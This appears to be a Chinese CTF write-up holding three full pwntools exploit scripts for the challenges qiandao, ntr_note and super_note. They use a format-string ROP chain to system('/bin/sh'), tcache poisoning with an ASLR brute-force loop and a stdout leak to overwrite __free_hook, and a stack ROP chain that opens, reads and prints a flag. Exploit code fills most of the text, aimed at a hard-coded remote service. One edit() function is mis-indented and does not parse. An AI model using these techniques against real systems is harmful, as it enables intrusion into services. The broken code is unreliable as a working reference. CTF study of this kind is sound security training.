NewCTF
调完了。写的爆破脚本用 `except Exception` 把所有异常都吞掉然后直接重连，结果脚本自身的一个低级错误一直被当成“ASLR 猜错”在重试，调了半天才定位到——爆破循环里至少应该把异常内容打印出来再重试。
# qiandao
格式化字符串漏洞。写的步骤有点多：先用一次 printf（`%7$p,%11$p,%9$p`）泄露 __libc_start_main 的返回地址、PIE 内指针和一个栈指针，再利用 `%hn` 每次两字节地把 ROP 链（ret; pop rdi; "/bin/sh"; system）写到栈上的返回地址处。
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from galatea import *
#context.log_level = 'debug'
# Target binary and the libc pwntools resolves for it.
binary = './qiandao'
elf = ELF('./qiandao')
libc = elf.libc
context.binary = binary

# DEBUG = 1 runs the challenge locally; 0 connects to the CTF service.
DEBUG = 0
if DEBUG:
    p = process(binary)
else:
    host = "81.68.86.115"
    port = 10001
    p = remote(host, port)
# Thin wrappers around the module-level tube `p` (usual pwntools shorthands).

def l64():
    """Read up to the next 0x7f byte and unpack the 6-byte address ending there."""
    raw = p.recvuntil("\x7f")[-6:]
    return u64(raw.ljust(8, "\x00"))


def l32():
    """Read up to the next 0xf7 byte and unpack the 4-byte address ending there."""
    raw = p.recvuntil("\xf7")[-4:]
    return u32(raw.ljust(4, "\x00"))


def sla(a, b):
    """sendline(str(b)) once str(a) has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send(str(b)) (no newline) once str(a) has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log an integer `data` as hex under `name`."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))


def rint(a):
    """Receive exactly len(str(a)) bytes, strip the leading "0x" and parse as hex.

    The sample `a` only fixes the number of bytes consumed; it is not compared
    with the received text.
    """
    raw = p.recv(len(str(a)))
    return int(raw[2:], 16)
def dbg():
    """Attach gdb to the live tube, then block until the operator continues."""
    gdb.attach(p)
    pause()
# one_gadget offset for the challenge libc. Only converted to an absolute
# address below; the final chain calls system() instead.
gadget = 0xe6c81

# --- stage 1: one printf call leaks libc, PIE base and a stack pointer ---
# Argument slots of the vulnerable printf, as used by the leak format:
#   %7$p  -> return address into __libc_start_main (+243)
#   %11$p -> a pointer into the PIE binary (page offset 0x82e)
#   %9$p  -> a stack pointer; the ROP chain is later written relative to it
payload = "%7$p," + "%11$p," + "%9$p,"
sl(payload)

# rint() consumes exactly len(sample) bytes, so the sample literals only
# encode the width of each printed pointer ("0x" + 12 hex digits).
__libc_start_main = rint("0x7f62b26990b3") - 243
libc_base = __libc_start_main - libc.sym["__libc_start_main"]
p.recvuntil(",")
pie_addr = rint("0x55d2c451e82e") - 0x82e
p.recvuntil(",")
stack_addr = rint("0x7fffa24e6e58") - 0xe0
gadget_addr = libc_base + gadget

# .bss slot in the binary; the later "%11$s" leak reads a heap pointer
# through it.
bss_addr = pie_addr + 0x000000000201030
lg("bss_addr", bss_addr)
#gdb.attach(p,"printf")
payload = "%"+str((stack_addr + 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((bss_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 + 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((bss_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "niyah%11$sgalatea"
sl(payload)
p.recvuntil("niyah")
heap_addr = u64(p.recv(6).ljust(8,"\x00"))
ret_addr = 0x000000000000065e + pie_addr
pop_rdi_ret_addr = 0x00000000000008f3 + pie_addr
system_addr = libc.sym["system"] + libc_base
lg("ret_addr",ret_addr)
lg("pop_rdi_ret_addr",pop_rdi_ret_addr)
lg("heap_addr",heap_addr)
lg("system_addr",system_addr)
payload = "\x00"*0x100 + "/catflag\x00"
sl(payload)
#gdb.attach(p,"printf")
payload = "%"+str((stack_addr - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 - 0x10 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((ret_addr >> 16 >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +2 - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr >> 16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 - 0x8 ) & 0xffff ) +"c%9$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((pop_rdi_ret_addr >> 16>>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((heap_addr + 0x30 ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 2 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str(((heap_addr + 0x30 )>>16 ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 4 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str(((heap_addr + 0x30 )>>16 >>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +0x8 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr ) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr + 2 + 0x8 ) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr >>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((stack_addr +4 + 0x8) & 0xffff ) +"c%24$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
payload = "%"+str((system_addr >>16>>16) & 0xffff ) +"c%37$hn" + "niyahgalatea\x00"
sl(payload)
p.recvuntil("niyahgalatea")
sleep(0.1)
#gdb.attach(p,"printf")
#pause()
payload = "61happy\x00".ljust(0x30,"a") + "/bin/sh\x00"
sl(payload)
#payload =
p.interactive()
# ntr_note
libc-2.31，程序没有 show 功能。脚本里有两处 2 字节的部分覆盖（`p16(0x7010)` 指向 tcache 结构体、`p16(0x26a0)` 指向 _IO_2_1_stdout_），每处都要猜 4 位 ASLR，所以总成功率约 1/256；泄露是通过把 stdout 的 flags 改成 0xfbad1800 并清掉 write_base 低字节，让下一次输出把 libc 地址打印出来，外层循环不断重连爆破。
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
import galatea
# 1 s tube timeout: a wrong ASLR guess shows up as a recv timeout/EOF
# instead of hanging the brute-force loop.
context.update(os='linux', timeout=1)

binary = 'ntr_note'
elf = ELF('ntr_note')
libc = elf.libc
context.binary = binary

# DEBUG = 1 runs the challenge locally; 0 connects to the CTF service.
DEBUG = 0
if DEBUG:
    p = process('./ntr_note')
else:
    host = "81.68.86.115"
    port = "10000"
    p = remote(host, port)
# Thin wrappers around the module-level tube `p` (usual pwntools shorthands).

def l64():
    """Read up to the next 0x7f byte and unpack the 6-byte address ending there."""
    raw = p.recvuntil("\x7f")[-6:]
    return u64(raw.ljust(8, "\x00"))


def l32():
    """Read up to the next 0xf7 byte and unpack the 4-byte address ending there."""
    raw = p.recvuntil("\xf7")[-4:]
    return u32(raw.ljust(4, "\x00"))


def sla(a, b):
    """sendline(str(b)) once str(a) has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send(str(b)) (no newline) once str(a) has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log an integer `data` as hex under `name`."""
    return p.success(name + ": 0x%x" % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))


def rint(a):
    """Receive exactly len(str(a)) bytes, strip the leading "0x" and parse as hex."""
    raw = p.recv(len(str(a)))
    return int(raw[2:], 16)
def dbg():
    """Attach gdb to the live tube, then block until the operator continues."""
    gdb.attach(p)
    pause()
def cmd(num):
    """Pick menu entry `num` when the "choice >>" prompt appears."""
    sla("choice >>", num)
def add(size, content):
    """Menu 1: allocate a note of `size` bytes and fill it with `content`."""
    cmd(1)
    for prompt, answer in (("size:", size), ("content:", content)):
        sla(prompt, answer)
def delete(id):
    """Menu 2: free note `id` (the note stays editable afterwards -> UAF)."""
    cmd(2)
    sla("idx:", id)
def edit(id, content):
    """Menu 4: overwrite note `id` with `content`.

    Uses send (not sendline) so short partial overwrites such as a single
    byte are delivered without a trailing newline.
    """
    cmd(4)
    sla("idx:", id)
    sa("content:", content)
def to_pwn():
    """One exploitation attempt against ntr_note; raises on a wrong ASLR guess.

    What the calls below do (tcache layout assumed to be glibc 2.31, the
    version named in the write-up):
      1. tcache-poison a 0x60 chunk onto the tcache control struct with a
         2-byte partial `next` overwrite (0x7010 = heap page + 0x10; 4 bits
         of ASLR guessed);
      2. free that struct into the unsorted bin and carve 0x50 chunks out of
         it, so notes overlap the tcache counts/entries arrays;
      3. partially overwrite a freed chunk's `next` to _IO_2_1_stdout_
         (0x26a0; another 4 bits guessed) and set the bin count to 1;
      4. rewrite stdout's flags/write_base so the next output leaks libc;
      5. tcache-poison onto __free_hook, store system(), free "/bin/sh".
    Works on the module-level tube `p`; timeouts/EOF propagate to the retry
    loop at the bottom of the script.
    """
    add(0x50, "aaaa")
    add(0x50, "aaaa")
    add(0x50, "aaaa")
    add(0x50, "aaaa")
    delete(1)
    delete(2)
    # UAF edit of a freed chunk: only the low 16 bits of its tcache `next`
    # change.  0x7010 assumes the heap page sits at 0x....7000 (1/16 guess).
    edit(2, p16(0x7010))
    add(0x50, "")  #4
    add(0x50, "")  #5: lands on the tcache control struct if the guess held
    #dbg()
    # Zero the first 36 16-bit counts and set counts[36..39] = 7 so the
    # struct's own chunk counts as a "full" bin on free and goes to the
    # unsorted bin instead of back into tcache.
    edit(5, p64(0)*9 + p64(0x0007000700070007))
    delete(5)
    # 0x40 requests are now carved out of the freed control struct.
    add(0x40, "")  #6
    add(0x40, "")  #7
    add(0x40, "")  #8
    delete(6)
    delete(7)
    edit(7, "\xb0")  # 1-byte partial overwrite: chunk 7's `next` -> chunk 8
    add(0x40, "")  #9: pops chunk 7; chunk 8 is now the bin head
    # Second guess: low 16 bits of _IO_2_1_stdout_ in the challenge libc
    # (page offset fixed, bits 12-15 random).
    edit(8, p16(0x26a0))
    add(0x40, "")  #10: pops chunk 8; stdout is now the bin head
    # Chunk 5 still aliases the tcache counts: counts[0..3] = 1 so the next
    # 0x40 request is served from the poisoned bin rather than the heap.
    edit(5, p64(0x0001000100010001))
    # _IO_FILE for stdout: flags = 0xfbad1800, read_ptr/read_end/read_base
    # zeroed, low byte of _IO_write_base cleared -> the next flush prints
    # libc memory starting below the buffer.
    payload = p64(0xfbad1800) + p64(0)*3 + "\x00"
    add(0x40, payload)  #11: this content write lands on _IO_2_1_stdout_
    leak = l64()
    # Empirical distance from the first leaked pointer to _IO_2_1_stdout_
    # for this libc build; re-derive if the challenge libc changes.
    stdout = leak + 0x336da
    libc_base = stdout - libc.sym["_IO_2_1_stdout_"]
    system_addr = libc_base + libc.sym["system"]
    __free_hook = libc_base + libc.sym["__free_hook"]
    __malloc_hook = libc_base + libc.sym["__malloc_hook"]  # logged only
    lg("leak", leak)
    lg("stdout", stdout)
    lg("__free_hook", __free_hook)
    lg("__malloc_hook", __malloc_hook)
    add(0x40, "")  #12
    add(0x40, "")  #13
    add(0x40, "/bin/sh\x00")  #14
    delete(12)
    delete(13)
    # Full 8-byte `next` overwrite (no safe-linking before glibc 2.32): the
    # second allocation from this bin returns __free_hook.
    edit(13, p64(__free_hook))
    add(0x40, "")
    add(0x40, p64(system_addr))
    # free(chunk 14) -> __free_hook("/bin/sh") -> system("/bin/sh").
    # NOTE(review): __free_hook was removed in glibc 2.34, so this last step
    # is tied to the challenge's libc version.
    delete(14)
    p.interactive()
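# Brute-force driver.  to_pwn() makes two 16-bit partial overwrites that each
# guess 4 bits of ASLR (~1/256 per run); a wrong guess surfaces as a
# timeout/EOF inside to_pwn(), so reconnect and try again.
i = 0
while True:
    i += 1
    log.warn(str(i))
    try:
        to_pwn()
    except Exception as e:
        # Log before retrying: a silent blanket except makes a script bug
        # (typo, bad offset) indistinguishable from a wrong ASLR guess.
        log.warn("attempt %d failed: %r" % (i, e))
        p.close()
        # Reopen the tube the same way it was opened at the top of the
        # script; the original always called remote() and would NameError
        # on `host` when DEBUG = 1.
        p = process('./ntr_note') if DEBUG else remote(host, port)
        continue
    # to_pwn() only returns once p.interactive() ends, i.e. after the shell;
    # don't loop back onto a closed tube.
    break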
# super_note
先爆破 _IO_2_1_stdout_ 的低 2 字节（`p16(0xd6a0)`，猜 4 位 ASLR）让 stdout 把 libc 地址打印出来，再把 stdout 的 write_base/write_ptr 指到 __environ 附近泄露栈地址，最后用 tcache poisoning 把 chunk 分配到栈上，写入 ORW（open/read/puts）的 ROP 链读 flag，终于会了。
# -*- encoding: utf-8 -*-
import sys
import os
from pwn import *
import galatea
# 1 s tube timeout: a wrong ASLR guess shows up as an empty recv (leak == 0)
# instead of hanging the brute-force loop.
context.update(os='linux', timeout=1)
context.log_level = 'debug'

binary = 'super_note'
elf = ELF('super_note')
libc = elf.libc
context.binary = binary

# DEBUG = 1 runs the challenge locally (the configured mode here); 0 would
# connect to a service, but no host/port is filled in.
DEBUG = 1
if DEBUG:
    p = process(binary)
else:
    host = ''
    port = ""
    p = remote(host, port)
# Thin wrappers around the module-level tube `p` (usual pwntools shorthands).

def l64():
    """Read up to the next 0x7f byte and unpack the 6-byte address ending there."""
    raw = p.recvuntil('\x7f')[-6:]
    return u64(raw.ljust(8, '\x00'))


def l32():
    """Read up to the next 0xf7 byte and unpack the 4-byte address ending there."""
    raw = p.recvuntil('\xf7')[-4:]
    return u32(raw.ljust(4, '\x00'))


def sla(a, b):
    """sendline(str(b)) once str(a) has been received."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """send(str(b)) (no newline) once str(a) has been received."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log an integer `data` as hex under `name`."""
    return p.success(name + ': 0x%x' % data)


def se(payload):
    return p.send(payload)


def rl():
    return p.recv()


def sl(payload):
    return p.sendline(payload)


def ru(a):
    return p.recvuntil(str(a))


def rint(a):
    """Receive exactly len(str(a)) bytes, strip the leading "0x" and parse as hex."""
    raw = p.recv(len(str(a)))
    return int(raw[2:], 16)
def dbg():
    """Attach gdb to the live tube, then block until the operator continues."""
    gdb.attach(p)
    pause()
def cmd(num):
    """Pick menu entry `num` when the "choice:" prompt appears."""
    sla("choice:", num)
def add(id, size):
    """Menu 1: allocate note `id` with a `size`-byte buffer (no content yet)."""
    cmd(1)
    for answer in (id, size):
        sla(":", answer)
def edit(id,context="aaa"):
cmd(2)
sla(":",id)
sa(":",context)
def show(id):
    """Menu 3: print note `id` (used once, to read the chunk address)."""
    cmd(3)
    sla(":", id)
def delete(id):
    """Menu 4: free note `id` (the note stays editable afterwards -> UAF)."""
    cmd(4)
    sla(":", id)
def to_pwn():
    """One exploitation attempt against super_note (local process).

    Steps visible below: tcache-poison onto the tcache control struct using
    a low-16-bit value derived from show(); free the struct so 0x40 chunks
    are carved from it; partially overwrite a freed `next` to
    _IO_2_1_stdout_ (p16(0xd6a0) -- the only guessed step, 4 bits of ASLR);
    rewrite stdout's flags/write pointers to leak libc and then __environ;
    tcache-poison a 0x70 chunk onto the stack and write a two-stage ROP
    chain that open()s, read()s and puts()es "flag".  A wrong guess leaves
    `leak == 0`, which raises so the retry loop restarts the process.
    """
    add(0, 0x50)
    add(1, 0x50)
    show(0)
    p.recvuntil("address:[")
    # rint() consumes len('0x1080') = 6 bytes, i.e. "0x" + 4 hex digits.
    # NOTE(review): presumably the program prints the chunk address in a
    # width that makes those 4 digits its low 16 bits, and 0x18b0 is chunk
    # 0's distance from the tcache control struct -- confirm against the
    # binary; p16() below will reject a negative result.
    low_addr = rint('0x1080') - 0x18b0
    lg("low_addr", low_addr)
    delete(0)
    delete(1)
    # 2-byte partial overwrite of chunk 1's tcache `next` (computed from the
    # leak above, so no guessing here).
    edit(1, p16(low_addr))
    # Scratch values seen while debugging: 0x8910, 0x7000, 0x18b0.
    add(0, 0x50)
    add(1, 0x50)  # lands on the tcache control struct
    # Zero the first 36 16-bit counts and set counts[36..39] = 7 so the
    # struct's own chunk counts as a "full" bin and goes to the unsorted
    # bin on free (glibc 2.31 tcache layout assumed).
    edit(1, p64(0)*9 + p64(0x0007000700070007))
    delete(1)
    # 0x40 requests are now carved out of the freed control struct.
    add(2, 0x40)
    add(3, 0x40)
    add(4, 0x40)
    delete(2)
    delete(3)
    edit(3, "\xb0")  # 1-byte partial overwrite: chunk 3's `next` -> chunk 4
    # The guess: low 16 bits of _IO_2_1_stdout_ in the local libc.
    edit(4, p16(0xd6a0))
    add(5, 0x40)
    add(6, 0x40)  # pops chunk 4; stdout is now the bin head
    # Note 1 still aliases the tcache counts: counts[0..3] = 1, counts[4..7] = 0.
    edit(1, p64(0x0001000100010001)+p64(0x0))
    # stdout: flags 0xfbad1800, read pointers zeroed, low byte of
    # _IO_write_base cleared -> next flush prints libc memory.
    payload = p64(0xfbad1800) + p64(0)*3 + "\x00"
    add(7, 0x40)  # allocated on top of _IO_2_1_stdout_
    edit(7, payload)
    p.recv(8)
    leak = l64()
    if leak == 0:
        # No 0x7f byte arrived within the timeout: wrong guess, retry.
        raise EOFError
    lg("leak", leak)
    # Distance from the leaked pointer to stdout, taken from two addresses
    # observed in a debugging session of this libc (stdout ends in 0xd6a0).
    offset = 0x7f563057d6a0 - 0x7f563057c980
    _IO_2_1_stdout_ = leak + offset
    libc_base = _IO_2_1_stdout_ -libc.sym["_IO_2_1_stdout_"]
    environ = libc_base + libc.sym['__environ']
    lg("environ", environ)
    # Point stdout's _IO_write_base/_IO_write_ptr around __environ so the
    # next flush prints the stack pointer stored there.
    payload = p64(0xfbad1800) + p64(0)*3 + p64(environ-0x10) +p64(environ+0x10)
    edit(7, payload)
    # -0x120: empirical distance from the __environ value to the stack slot
    # the chain is written to.
    stack_addr = l64() - 0x120
    lg("stack_addr", stack_addr)
    # tcache poisoning of the 0x70 bin with a full 8-byte pointer (no
    # safe-linking before glibc 2.32): note 9 is allocated at stack_addr.
    add(8, 0x60)
    delete(8)
    edit(8, p64(stack_addr))
    add(8, 0x60)
    add(9, 0x60)
    read_addr = libc.sym["read"] + libc_base
    open_addr = libc.sym["open"] + libc_base  # unused: open is done via raw syscall
    puts_addr = libc.sym["puts"] + libc_base
    # Gadget offsets for this libc build; `syscall` was located by hand.
    ret = 0x0000000000025679 + libc_base
    syscall = 0X00000000011B70B + libc_base
    pop_rax_ret = 0x000000000004a550 + libc_base
    pop_rdi_ret = 0x0000000000026b72 + libc_base
    pop_rsi_ret = 0x0000000000027529 + libc_base
    pop_rdx_rbx_ret = 0x00000000001626d6 + libc_base
    lg("pop_rdi_ret", pop_rdi_ret)
    lg("read_addr", read_addr)
    #gdb.attach(p,"b *puts")
    #pause()
    # Stage 1 (8 qwords = 0x40 bytes): read(0, stack_addr, 0x400) pulls the
    # real chain in over this one.  When read returns it pops the qword at
    # stack_addr+0x40, which is where payload_orw's chain starts.
    payload = p64(pop_rdi_ret) + p64(0) + p64(pop_rsi_ret) + p64(stack_addr) + p64(pop_rdx_rbx_ret) + p64(0x400) +p64(0) + p64(read_addr)
    edit(9, payload)
    # Stage 2: "flag" at stack_addr, padded to 0x40; then
    #   open("flag", 0) via syscall (rax = 2),
    #   read(3, stack_addr+0x100, 0x100)   (fd 3 assumed: first open in the process),
    #   puts(stack_addr+0x100).
    payload_orw = "flag\x00".ljust(0x40,"\x00")
    payload_orw+= p64(pop_rax_ret) + p64(2) + p64(pop_rdi_ret) + p64(stack_addr) + p64(pop_rsi_ret) + p64(0) + p64(syscall)
    payload_orw+= p64(pop_rdi_ret) + p64(3) + p64(pop_rsi_ret) + p64(stack_addr+0x100) + p64(pop_rdx_rbx_ret) + p64(0x100)+ p64(0x100)+p64(read_addr)
    payload_orw+= p64(pop_rdi_ret) + p64(stack_addr+0x100) + p64(puts_addr)
    #dbg()
    # "done" is presumably the program's reply to the edit; the stage-1
    # read() then consumes this line.
    sla("done", payload_orw)
    p.interactive()
#to_pwn()
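# Brute-force driver: to_pwn() guesses 4 bits of ASLR for the stdout
# overwrite (~1/16 per run) and raises EOFError on a miss; restart and retry.
i = 0
while True:
    i += 1
    log.warn(str(i))
    try:
        to_pwn()
    except Exception as e:
        # Log before retrying: a silent blanket except makes a script bug
        # indistinguishable from a wrong ASLR guess.
        log.warn("attempt %d failed: %r" % (i, e))
        p.close()
        # Reopen the tube the same way it was opened at the top of the
        # script; the original always spawned a local process even when
        # DEBUG = 0 selected a remote target.
        p = process(binary) if DEBUG else remote(host, port)
        continue
    # to_pwn() only returns once p.interactive() ends; don't loop back onto
    # a closed tube.
    break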
'''
@File : super_note.py
@Time : 2021/06/03 19:52:39
@Author : Niyah
'''
本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。